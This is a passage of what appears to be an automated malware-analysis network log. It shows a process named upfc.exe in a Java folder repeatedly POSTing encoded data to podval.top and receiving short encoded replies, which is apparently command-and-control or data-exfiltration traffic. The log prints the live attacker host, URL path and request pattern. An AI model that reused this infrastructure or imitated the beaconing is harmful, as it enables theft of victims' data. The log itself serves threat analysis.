                                                    Data Ascii: ;9,*/3?&^$?979\$?XQ7Y-20! $<_<!4Z= ?),09$ ?0*..)YZZ%X[^R4#04 :\408]-9>9+[*[[:Q&Y(\:TS:+0Y4&?8&:Z 9R+ !/?%\5US$8!<)&,6A4X88)V](&;U<3+4;U;>Z<%WR2D_VT0.V= V+?&IY[
                                                    Jul 3, 2024 16:42:15.221442938 CEST4944OUTData Raw: 38 3c 3a 2a 21 3c 19 13 2f 3b 3a 5d 31 11 0d 26 39 05 28 3a 39 5c 06 19 3f 5d 3f 01 09 04 32 08 28 03 39 1d 3a 55 3f 5a 3a 5c 12 3f 3c 03 2c 3f 37 3f 0f 1e 32 25 05 43 38 03 2b 16 33 31 38 3d 34 3f 14 2d 0a 03 1c 2f 02 2e 22 3d 3f 25 00 3f 08 23
                                                    Data Ascii: 8<:*!</;:]1&9(:9\?]?2(9:U?Z:\?<,?7?2%C8+318=4?-/."=?%?#4*4(?'88.,8 :/-"[=Y:7'<,7^34#&.:=!/ZV2>75904!Z/X&8)0Z:U381P0 (_$:Y.4?R5*%;\$9U#-14Y/&.2?=->1:!3_?;2"P1#
                                                    Jul 3, 2024 16:42:15.226609945 CEST4944OUTData Raw: 3c 23 20 3f 2f 5a 3c 38 20 1c 3f 23 37 39 31 03 2d 5d 34 58 38 2a 28 5a 0c 33 2a 16 01 01 50 24 3b 59 1a 12 33 58 0a 34 21 27 36 28 25 00 2a 22 0f 56 2c 09 30 58 24 08 3f 07 0a 5e 06 38 04 16 36 0a 3e 22 31 2d 13 0c 34 07 5e 1d 06 06 37 2b 0f 33
                                                    Data Ascii: <# ?/Z<8 ?#791-]4X8*(Z3*P$;Y3X4!'6(%*"V,0X$?^86>"1-4^7+3/05X3 !;U8G3E=;"T<4?*5T3_+(%^.*UQ6Y#9!23"W+'#5;C3S' U%==W@.!/(&*]<";13Z_(_$\#8]?4#?'>5&6R,\8)#,R#&;+_$ ,*
                                                    Jul 3, 2024 16:42:15.226665974 CEST9888OUTData Raw: 26 56 33 56 0f 52 01 3f 03 30 12 5b 12 2a 3e 01 34 5f 20 1f 0a 2f 5d 47 26 50 3a 2d 3e 03 07 22 27 16 34 04 13 3b 35 51 33 2e 02 33 29 29 03 5b 01 35 29 10 35 33 26 30 2c 59 25 21 08 5b 29 52 3a 23 5b 54 25 57 3a 27 26 35 06 30 3f 22 2d 2c 31 55
                                                    Data Ascii: &V3VR?0[*>4_ /]G&P:->"'4;5Q3.3))[5)53&0,Y%![)R:#[T%W:'&50?"-,1UD?<87$^$?%("3_>P $9+74'<X*]&6_='*<<-.Y&9,A$;4(=Y6>.<*Y>"?"V;Z(4;\)27;,49;'&?6-4Y?2$"5:(:8'1>66Z$%3#=/_C:
                                                    Jul 3, 2024 16:42:15.226763010 CEST19776OUTData Raw: 06 39 58 10 39 2e 41 38 07 06 2a 07 27 41 21 5a 38 56 27 14 30 07 5f 58 20 0b 3f 1c 30 15 31 06 34 39 2c 20 38 3b 2b 29 3c 2e 2e 24 32 00 3f 40 3b 5b 3b 5c 3b 02 01 40 22 34 5d 3c 25 3b 00 33 3c 08 0a 15 36 5b 5a 51 35 2e 15 3f 36 35 10 5f 04 40
                                                    Data Ascii: 9X9.A8*'A!Z8V'0_X ?0149, 8;+)<..$2?@;[;\;@"4]<%;3<6[ZQ5.?65_@U"7>W)=-4059</':5P2=$Y%\*3?^(+?2SA#>9T]'%4>'.2_.'64Q(? 3>A6 #,<2=0;-U1$T9YT=4)*:Y^>$+073>!9#?<X'$,85>?3!9$?+/#.%
                                                    Jul 3, 2024 16:42:15.226869106 CEST7416OUTData Raw: 26 32 24 31 35 3c 1e 2b 29 3e 01 07 2c 5f 0b 5c 30 35 14 26 30 3f 21 22 22 28 17 36 33 3e 3b 01 09 31 59 56 27 18 3b 1c 37 55 5e 5b 15 26 3e 59 3c 34 30 35 08 3f 1c 35 3d 24 08 11 22 5c 07 2f 27 34 1e 22 3c 2a 26 54 0d 0c 06 05 29 34 0f 5e 37 37
                                                    Data Ascii: &2$15<+)>,_\05&0?!""(63>;1YV';7U^[&>Y<405?5=$"\/'4"<*&T)4^77)R0>.6 #W:AZ3VV>3=%$V5<383.%3 #8_<P89K!++>>YV+>U>:(9?_/Z1!=)3%'*- ;,?!>3<3X#>U -+%0)]#+X9>!B9Y
                                                    Jul 3, 2024 16:42:15.308759928 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:16.435770988 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZRe094oetI%2F0PXyCTJ3cl6ShKFoG8idhrcqgao3vLB7cIncbPicZYSoakKpzwOqgZtqz%2FSn4L0r59Hjwbcq6n8IYYzMCslbSZJv%2FAnC01gKCu%2FYDH8E6F3I9Cns9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a41d6c3a1a07-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.1049716188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:15.332123041 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:15.682183027 CEST1060OUTData Raw: 5a 56 5a 5e 5b 5d 52 58 58 56 55 51 50 58 59 55 55 5b 5e 55 51 5b 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZVZ^[]RXXVUQPXYUU[^UQ[SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&9?$#]$;(.T#=:=9$)%00,>X"28,"['$Y !
                                                    Jul 3, 2024 16:42:15.781455994 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:16.129295111 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QoNAUPPPgLgOiER4eHthpx9vzCiw%2F6CqGrNmhOEqpZ9BLy9M4WtjeHO1wwEXMatZT0XmNyP%2BD2ErTXLSYLMEbvmYU%2FFsYhuLWobmpoILQjky387EC3Su0Za%2B7xe"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4205e8741e1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.1049719188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:16.285402060 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:16.635624886 CEST1060OUTData Raw: 5f 5a 5f 5d 5b 58 57 5a 58 56 55 51 50 51 59 54 55 5f 5e 58 51 5f 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_][XWZXVUQPQYTU_^XQ_SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X19#3)^$3 (.9#-2:*0)\3U 8=;#,<"['$Y
                                                    Jul 3, 2024 16:42:16.745060921 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:16.949011087 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykFempdKoUTNXMbvbwQ9o7%2FOob%2Fdv8zvL31fbnxE0%2FGoMDrX48MD41In4mVHKw%2FOteTY9KFLuhdK0p5je5F8wPG230CKDa3Fh6mCSIj8wbEBmt7ApBdIu%2FUo3LAt"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a42659ad728f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.1049722188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:17.092459917 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.1049723188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:17.392743111 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:17.744534969 CEST1772OUTData Raw: 5a 52 5a 59 5b 5a 57 59 58 56 55 51 50 50 59 5a 55 5d 5e 5a 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZRZY[ZWYXVUQPPYZU]^ZQXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y&9/$*8%0Z>X% 5].>>'C6$?R/>#!78"['$Y
                                                    Jul 3, 2024 16:42:17.868181944 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:18.210037947 CEST731INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UAW%2BtdHS0f3I54zdelmtlkJpbNnBHZQTjMJhmPWy9K291b6mvsyv%2Bpxn8caCvzk0f8x2HuEdQSiVzyTQa9tcXYNfZsaL%2BhP4M4GCEiyENwEonv9rWDEo%2B9HY4543"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a42d6ae6728a-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5f 26 03 31 10 32 0b 33 16 2e 13 23 50 2b 03 27 07 3b 00 35 5a 3c 24 00 02 39 2e 2e 51 20 39 3e 5d 3f 3f 2c 5e 31 33 3f 0d 35 1b 20 5b 04 1c 23 5d 3f 04 35 13 3c 06 20 0a 26 05 32 1e 27 09 2a 03 33 28 2d 0a 33 16 0d 5b 3c 16 3a 0e 33 21 38 03 2b 38 29 02 28 27 32 5b 20 34 21 54 02 13 21 08 33 13 39 55 23 30 27 53 32 0e 32 07 24 42 2b 51 25 30 22 53 29 0d 35 0d 27 0f 30 11 35 01 0d 57 33 01 26 5c 24 2d 00 03 21 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%_&123.#P+';5Z<$9..Q 9>]??,^13?5 [#]?5< &2'*3(-3[<:3!8+8)('2[ 4!T!39U#0'S22$B+Q%0"S)5'05W3&\$-!8#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.1049724188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:17.579336882 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:17.932447910 CEST1060OUTData Raw: 5a 50 5a 5f 5e 5a 52 5a 58 56 55 51 50 51 59 55 55 5e 5e 5d 51 55 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ_^ZRZXVUQPQYUU^^]QUS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[1,D0']0 #[)-.#":>35"$;871+,"['$Y
                                                    Jul 3, 2024 16:42:18.051175117 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:18.397026062 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuJFWIGGWlqIm1w%2BkMpokhJhNUUQ4j9I5ygcwKuATHWXULIWaVjONELdRbcqM53zpR99%2BQpWM8zEHcwZqPUp7QmBY29M%2B%2Bh63zSlH%2BGRsETQ8%2FPzL5HfqHHf4TSi"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a42e8d904362-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.1049728188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:18.569711924 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:18.916588068 CEST1060OUTData Raw: 5f 51 5f 5c 5e 5b 52 5c 58 56 55 51 50 5f 59 57 55 58 5e 54 51 5a 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Q_\^[R\XVUQP_YWUX^TQZSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X2?3);$ *W -":X$'08?[72$;"['$Y =
                                                    Jul 3, 2024 16:42:19.021759033 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:19.390098095 CEST590INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMafNFBZe%2FDSy6RadHq0rnUENK6enfkdIw%2BahCA%2Fa3KPYqq9%2FHzfs7cXDCoqfCf9D%2FZwrmCZso1B1oJE3HzuOfsDkY09MVP3bDzdxLMkPJLCgeV%2BkQD%2B%2F17jXuYf"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4349d8a0f95-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.1049729188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:19.524100065 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:19.869524002 CEST1060OUTData Raw: 5a 55 5a 5e 5e 5b 57 50 58 56 55 51 50 5b 59 50 55 5e 5e 5d 51 5e 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZ^^[WPXVUQP[YPU^^]Q^S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'9B&)']0 Z(.* [5Y-X%365'3</.Z#$/"['$Y -
                                                    Jul 3, 2024 16:42:19.990917921 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:20.323458910 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Md8A3fCBqYWB7OB0%2FWqNSyrYsUAXz7jiJoNcgZXppwrUBgCr%2BTz2ICXHWE2gxxJq%2F6%2BKkdQh6EHn2hBrflO9mS4X9Q%2BcoynYQzCfJZbQOhYGxZwGP0Pmy9G3mTtJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a43aaa24427f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.1049730188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:20.455785036 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:20.811794043 CEST1060OUTData Raw: 5f 5b 5f 5d 5e 58 57 5f 58 56 55 51 50 5c 59 55 55 5c 5e 55 51 5e 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_]^XW_XVUQP\YUU\^UQ^S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%<D0/Y0+Z=-)T7[69>]3$#?T,.7_4;<"['$Y 1
                                                    Jul 3, 2024 16:42:20.931277037 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:21.262813091 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiTRNH50VGXjChyFENzVrDztopTrEDgtlKMGluWaNYEgiWZn03QS0GZNjFRriZnNglvfQVGEOc4DIxBncN3RWPfki6VSVnhZIn%2BDR%2BulEwBeltmu9RNia2oGMjWj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4408d1e41ba-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.1049731188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:21.406968117 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:21.760194063 CEST1060OUTData Raw: 5f 5b 5f 5d 5b 5c 57 59 58 56 55 51 50 50 59 56 55 58 5e 5b 51 5e 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_][\WYXVUQPPYVUX^[Q^SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%#'?$ )R#.&,>&'%'+T/X#X 4[-<"['$Y
                                                    Jul 3, 2024 16:42:21.859070063 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:22.196830988 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8o5fSBPvUgS1u0Rzw%2FkU1zFUWw6ziPD5%2FWiplpswvCD0kMQt%2FMyMQ5Kl9Vig%2Bs7Qfw9pSMlC1mM7GPjQgiO3W7pbWTFoLGI%2FJobLHETI2Gwfmi09xboYMZCD%2FNQ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4465e79c3ff-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.1049732188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:22.332765102 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:22.682444096 CEST1060OUTData Raw: 5f 53 5a 5b 5e 5d 57 5a 58 56 55 51 50 5b 59 52 55 5f 5e 5e 51 58 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
